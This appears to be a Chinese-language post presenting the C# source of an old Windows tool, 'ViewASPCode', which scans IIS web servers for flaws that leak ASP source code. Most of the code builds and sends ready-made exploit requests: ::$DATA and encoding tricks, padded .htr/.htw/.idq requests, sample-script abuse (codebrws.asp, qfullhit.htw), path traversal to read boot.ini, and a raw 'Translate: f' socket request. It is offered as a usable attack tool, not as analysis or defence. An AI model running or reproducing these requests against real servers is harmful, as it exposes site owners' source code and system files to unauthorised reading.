一個用c#寫的掃描asp源碼漏洞的應用程式

這兒就是說的那個程式主要部分的原始碼.
//--------------------------------------------------------------------------
//
// file name : form1.cs
//
// description : 主form
//
// date: 2001/1/3
//
// author : bigeagle@163.net
// http://bigeagle.yeah.net
//
// history : 2000/1/3 version 0.9
//
// ToDo: translate:f 方法似乎有問題，等得到有關http協議的資料在修改
//
//-------------------------------------------------------------------------

namespace findbug
{
using System;
using System.Drawing;
using System.Collections;
using System.ComponentModel;
using System.WinForms;
using System.Data;
using System.Net ;
using System.IO ;
using System.Text ;
using System.Net.Sockets ;

/// <summary>
/// Summary description for Form1.
/// </summary>
public class Form1 : System.WinForms.Form
{
/// <summary>
/// Required designer variable.
/// </summary>
private System.ComponentModel.Container components;
private System.WinForms.StatusBar barStatus;
private System.WinForms.Button btnClear;
private System.WinForms.TextBox txtResult;
private System.WinForms.Button btnGo;
private System.WinForms.Label label3;
private System.WinForms.ComboBox cboMethod;
private System.WinForms.TextBox txtFileName;
private System.WinForms.Label label2;
private System.WinForms.TextBox txtServer;
private System.WinForms.Label label1;
private System.WinForms.MenuItem mnuExit;
private System.WinForms.MenuItem menuItem1;
private System.WinForms.MenuItem mnuNew;
private System.WinForms.MenuItem mnuAbount;
private System.WinForms.MenuItem mnuHelp;
private System.WinForms.MenuItem mnuSave;
private System.WinForms.MenuItem mnuFile;
private System.WinForms.MainMenu mainMenu1;

public Form1()
{
//
// Required for Windows Form Designer support
//
InitializeComponent();

//初始化視窗
InitForm() ;

}

public override void Dispose()
{
base.Dispose();
components.Dispose();
}

//初始化控制項
private void InitializeComponent()
{
this.components = new System.ComponentModel.Container ();
this.mnuSave = new System.WinForms.MenuItem ();
this.mnuNew = new System.WinForms.MenuItem ();
this.cboMethod = new System.WinForms.ComboBox ();
this.btnGo = new System.WinForms.Button ();
this.menuItem1 = new System.WinForms.MenuItem ();
this.mnuFile = new System.WinForms.MenuItem ();
this.txtServer = new System.WinForms.TextBox ();
this.mnuHelp = new System.WinForms.MenuItem ();
this.btnClear = new System.WinForms.Button ();
this.label2 = new System.WinForms.Label ();
this.label1 = new System.WinForms.Label ();
this.mnuAbount = new System.WinForms.MenuItem ();
this.barStatus = new System.WinForms.StatusBar ();
this.mainMenu1 = new System.WinForms.MainMenu ();
this.mnuExit = new System.WinForms.MenuItem ();
this.txtResult = new System.WinForms.TextBox ();
this.label3 = new System.WinForms.Label ();
this.txtFileName = new System.WinForms.TextBox ();
mnuSave.Text = "儲存";
mnuSave.Shortcut = System.WinForms.Shortcut.CtrlS;
mnuSave.Index = 1;
mnuNew.Text = "建立";
mnuNew.Shortcut = System.WinForms.Shortcut.F2;
mnuNew.Index = 0;
mnuNew.Click += new System.EventHandler (this.mnuNew_Click);
cboMethod.Location = new System.Drawing.Point (96, 56);
cboMethod.Size = new System.Drawing.Size (121, 20);
cboMethod.TabIndex = 4;
btnGo.Location = new System.Drawing.Point (296, 56);
btnGo.Size = new System.Drawing.Size (75, 23);
btnGo.TabIndex = 6;
btnGo.Text = "讓我看";
btnGo.Click += new System.EventHandler (this.btnGo_Click);
menuItem1.Text = "-";
menuItem1.Index = 2;
mnuFile.Text = "檔案(&F)";
mnuFile.Index = 0;
mnuFile.MenuItems.All = new System.WinForms.MenuItem[4] {this.mnuNew, this.mnuSave, this.menuItem1, this.mnuExit};
txtServer.Location = new System.Drawing.Point (96, 16);
txtServer.Text = "http://";
txtServer.TabIndex = 1;
txtServer.Size = new System.Drawing.Size (100, 21);
mnuHelp.Text = "協助(&H)";
mnuHelp.Index = 1;
mnuHelp.MenuItems.All = new System.WinForms.MenuItem[1] {this.mnuAbount};
btnClear.Location = new System.Drawing.Point (408, 56);
btnClear.Size = new System.Drawing.Size (75, 23);
btnClear.TabIndex = 8;
btnClear.Text = "清空";
btnClear.Click += new System.EventHandler (this.btnClear_Click);
label2.Location = new System.Drawing.Point (224, 16);
label2.Text = "檔案名稱：";
label2.Size = new System.Drawing.Size (72, 16);
label2.Font = new System.Drawing.Font ("宋體", 12);
label2.TabIndex = 2;
label1.Location = new System.Drawing.Point (24, 21);
label1.Text = "主機名稱：";
label1.Size = new System.Drawing.Size (72, 16);
label1.Font = new System.Drawing.Font ("宋體", 12);
label1.TabIndex = 0;
mnuAbount.Text = "關於";
mnuAbount.Shortcut = System.WinForms.Shortcut.CtrlA;
mnuAbount.Index = 0;
mnuAbount.Click += new System.EventHandler (this.mnuAbount_Click);
barStatus.BackColor = System.Drawing.SystemColors.Control;
barStatus.Location = new System.Drawing.Point (0, 423);
barStatus.Size = new System.Drawing.Size (568, 18);
barStatus.TabIndex = 9;
barStatus.Text = "就緒";
mainMenu1.MenuItems.All = new System.WinForms.MenuItem[2] {this.mnuFile, this.mnuHelp};
mnuExit.Text = "退出(&X)";
mnuExit.Shortcut = System.WinForms.Shortcut.AltF4;
mnuExit.Index = 3;
mnuExit.Click += new System.EventHandler (this.mnuExit_Click);
txtResult.Location = new System.Drawing.Point (16, 96);
txtResult.Multiline = true;
txtResult.ScrollBars = System.WinForms.ScrollBars.Both;
txtResult.TabIndex = 7;
txtResult.Size = new System.Drawing.Size (536, 312);
txtResult.Visible = false;
label3.Location = new System.Drawing.Point (32, 56);
label3.Text = "使用";
label3.Size = new System.Drawing.Size (56, 16);
label3.Font = new System.Drawing.Font ("宋體", 12);
label3.TabIndex = 5;
txtFileName.Location = new System.Drawing.Point (304, 16);
txtFileName.TabIndex = 3;
txtFileName.Size = new System.Drawing.Size (232, 21);
this.Text = "ViewASPCode";
this.StartPosition = System.WinForms.FormStartPosition.CenterScreen;
this.AutoScaleBaseSize = new System.Drawing.Size (6, 14);
this.Menu = this.mainMenu1;
this.ClientSize = new System.Drawing.Size (568, 441);
this.Controls.Add (this.barStatus);
this.Controls.Add (this.btnClear);
this.Controls.Add (this.txtResult);
this.Controls.Add (this.btnGo);
this.Controls.Add (this.label3);
this.Controls.Add (this.cboMethod);
this.Controls.Add (this.txtFileName);
this.Controls.Add (this.label2);
this.Controls.Add (this.txtServer);
this.Controls.Add (this.label1);
}

//功能表項目about點擊，顯示about對話方塊
protected void mnuAbount_Click (object sender, System.EventArgs e)
{
about objAbout = new about() ;
objAbout.ShowDialog(this) ;
objAbout.Dispose() ;
}

//初始化視窗
private void InitForm()
{
this.cboMethod.Items.Add("直接讀取") ;
this.cboMethod.Items.Add(".") ;
this.cboMethod.Items.Add("%81") ;
this.cboMethod.Items.Add("::DATA") ;
this.cboMethod.Items.Add("%2e") ;
this.cboMethod.Items.Add("%2e%41sp") ;
this.cboMethod.Items.Add("+.htr") ;
this.cboMethod.Items.Add("//") ;
this.cboMethod.Items.Add("longhtr") ;
this.cboMethod.Items.Add(".bak") ;
this.cboMethod.Items.Add("codebrws.asp") ;
this.cboMethod.Items.Add("showcode.asp") ;
this.cboMethod.Items.Add("null.htw") ;
this.cboMethod.Items.Add("qfullhit.htw") ;
this.cboMethod.Items.Add("qsumrhit.htw") ;
this.cboMethod.Items.Add("query.idq") ;
this.cboMethod.Items.Add("search/qfullhit.htw") ;
this.cboMethod.Items.Add("search/qsumrhit.htw") ;
this.cboMethod.Items.Add("iirturnh.htw") ;
this.cboMethod.Items.Add(".htw") ;
this.cboMethod.Items.Add("Translate:f") ;

this.cboMethod.SelectedIndex = 0 ;
}

//建立
protected void mnuNew_Click (object sender, System.EventArgs e)
{
this.txtServer.Text = "http://" ;
this.txtFileName.Text = "" ;
this.txtResult.Text = "" ;
}

//清除結果
protected void btnClear_Click (object sender, System.EventArgs e)
{
this.txtResult.Text = "" ;
}

//主要方法
protected void btnGo_Click (object sender, System.EventArgs e)
{

//解析url
string strServer = this.txtServer.Text ;
string strUrl = this.txtFileName.Text ;
char [] point = {'.'} ; //定義分割符為"."
char[] line = {'/'} ; //定義分割符為"."
string [] arrString = strUrl.Split(line) ;

//求asp檔案全名
string strFileName = arrString[arrString.Length - 1] ;
//求從根目錄下的路徑
string strPath = strUrl.Substring( 0 ,
strUrl.Length - strFileName.Length) ;

//解析檔案全名
arrString = strFileName.Split(point) ;
//求副檔名
string strLast = arrString[arrString.Length - 1] ;
//求檔案名稱
string strFirst = strFileName.Substring( 0 ,
strFileName.Length - strLast.Length - 1) ;

//使按鈕、輸入框等失效
this.txtServer.ReadOnly = true ;
this.txtFileName.ReadOnly = true ;
this.btnClear.Enabled = false ;
this.btnGo.Enabled = false ;

if (this.txtServer.Text == "http://" || this.txtFileName.Text == ""
|| this.txtServer.Text.Trim()== "" ||
this.txtServer.Text.Substring(0,7) != "http://")
{
MessageBox.Show("請輸入正確的主機名稱和檔案名稱！") ;
this.txtServer.Focus() ;
}
else
{
this.txtResult.Visible = true ;
this.txtResult.ReadOnly = true ;
this.barStatus.Text = "正在連結主機…" ;

string strRequestFile ;

switch (this.cboMethod.SelectedIndex)
{
case 0: //直接讀取
strRequestFile = strServer + strUrl ;
break ;
case 5 : //%2e%41sp
strRequestFile = strServer + strPath + strFirst
+ "%2e%41sp" ;
break ;
case 8 : //longhtr
strRequestFile = strServer + strUrl
+ "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr" ;
break ;

case 10: //codebrws.asp
strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
+ strUrl ;
break ;

case 11: //showcode.asp
strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
+ "/msadc/../../../../boot.ini" ;
break;

case 12 : //null.htw
strRequestFile = strServer + "/null.htw?CiWebHitsFile="
+ strUrl + "%20&CiRestriction=none&CiHiliteType=Full" ;
break ;
case 13 : //qfullhit.htw
strRequestFile = strServer + "/iissamples/issamples/oop/qfullhit.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;

case 14 : //qsumrhit.htw
strRequestFile = strServer + "/iissamples/issamples/oop/qsumrhit.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;

case 15 : //query.idq
strRequestFile = strServer + "/query.idq?CiTemplate=/../../boot.ini"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htx";
break ;

case 16: //search/qfullhit.htw
strRequestFile = strServer + "/iissamples/exair/search/qfullhit.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;

case 17: // search/qsumrhit.htw
strRequestFile = strServer + "/iissamples/exair/search/qsumrhit.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;

case 18: //iirturnh.htw
strRequestFile = strServer + "/iishelp/iis/misc/iirturnh.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full";
break ;

case 19: //.htw
strRequestFile = strServer + strUrl
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
+ "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
+ "%20%20%20%20%20%20%20%20%20%20%20.htw?"
+ "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
+ "&CiHiliteType=Full" ;
break ;

default:
strRequestFile = strServer + strUrl + this.cboMethod.Text ;
}

this.barStatus.Text = "發送請求："
+ (strRequestFile.Length >= 50 ?
strRequestFile.Substring(0 , 50)
:strRequestFile)
+ "...";

string strResult ;
//如果不是translate:f方法則可以直接發送http請求
if (this.cboMethod.SelectedIndex != 20)
{
//直接發送http請求
strResult = Get_Http(strRequestFile) ;

this.barStatus.Text += "完成。" ;
strResult = strResult == "" ? "未找到！" : strResult ;
this.txtResult.Text = strResult ;
}
else //translate:f方法需要建立tcp/ip串連
{
string strRequest = "GET " + strServer + strUrl
+ "/r/nHTTP/1.0/r/nTranslate:f/r/n" ;
strResult = Get_Socket_Request(strServer , strRequest , 80) ;
this.barStatus.Text += "完成。" ;
strResult = strResult == "" ? "未找到！" : strResult ;
this.txtResult.Text = strResult ;

}

}

//使按鈕、輸入款等恢複
this.txtServer.ReadOnly = false ;
this.txtFileName.ReadOnly = false ;
this.btnClear.Enabled = true ;
this.btnGo.Enabled = true ;

}

//通過同server建立tcp/ip串連，發送socket命令
private string Get_Socket_Request(string a_strServer , string a_strRequest , Int32 a_intPort)
{
//Set up variables and String to write to the server
Encoding ASCII = Encoding.Default ;
string Get = a_strRequest + "Connection: Close/r/n/r/n";
//string Get =
Byte[] ByteGet = ASCII.GetBytes(Get);
Byte[] RecvBytes = new Byte[256];
String strRetPage = null;

// IPAddress and IPEndPoint represent the endpoint that will
// receive the request
IPAddress hostadd = DNS.Resolve(a_strServer.Substring(7 ,a_strServer.Length - 7));
IPEndPoint EPhost = new IPEndPoint(hostadd, a_intPort);

//Create the Socket for sending data over TCP
Socket s = new Socket(AddressFamily.AfINet, SocketType.SockStream,
ProtocolType.ProtTCP );

// Connect to host using IPEndPoint
if (s.Connect(EPhost) != 0)
{
strRetPage = "Unable to connect to host";
return strRetPage;
}

// Sent the GET text to the host
s.Send(ByteGet, ByteGet.Length, 0);

// Receive the page, loop until all bytes are received
Int32 bytes = s.Receive(RecvBytes, RecvBytes.Length, 0);
strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);

while (bytes > 0)
{
bytes = s.Receive(RecvBytes, RecvBytes.Length, 0);
strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
}

return strRetPage ;
}

//擷取http頁面函數
private string Get_Http(string a_strUrl)
{
string strResult ;
HttpWebRequest myReq = (HttpWebRequest)
WebRequestFactory.Create(a_strUrl) ;

try
{
HttpWebResponse HttpWResp = (HttpWebResponse)myReq.GetResponse();
Stream myStream = HttpWResp.GetResponseStream () ;

StreamReader sr = new StreamReader(myStream , Encoding.Default);
StringBuilder strBuilder = new StringBuilder();
while (-1 != sr.Peek())
{
strBuilder.Append(sr.ReadLine()+"/r/n");
}

strResult = strBuilder.ToString();
}
catch(Exception exp)
{
strResult = "錯誤：" + exp.Message ;
}

return strResult ;

}

//退出
protected void mnuExit_Click (object sender, System.EventArgs e)
{

if (MessageBox.Show("真的退出嗎？" , "退出系統" , MessageBox.YesNo) == DialogResult.Yes)
{
this.Close () ;

}
}

//主函數
public static void Main(string[] args)
{
Application.Run(new Form1());
}
}
}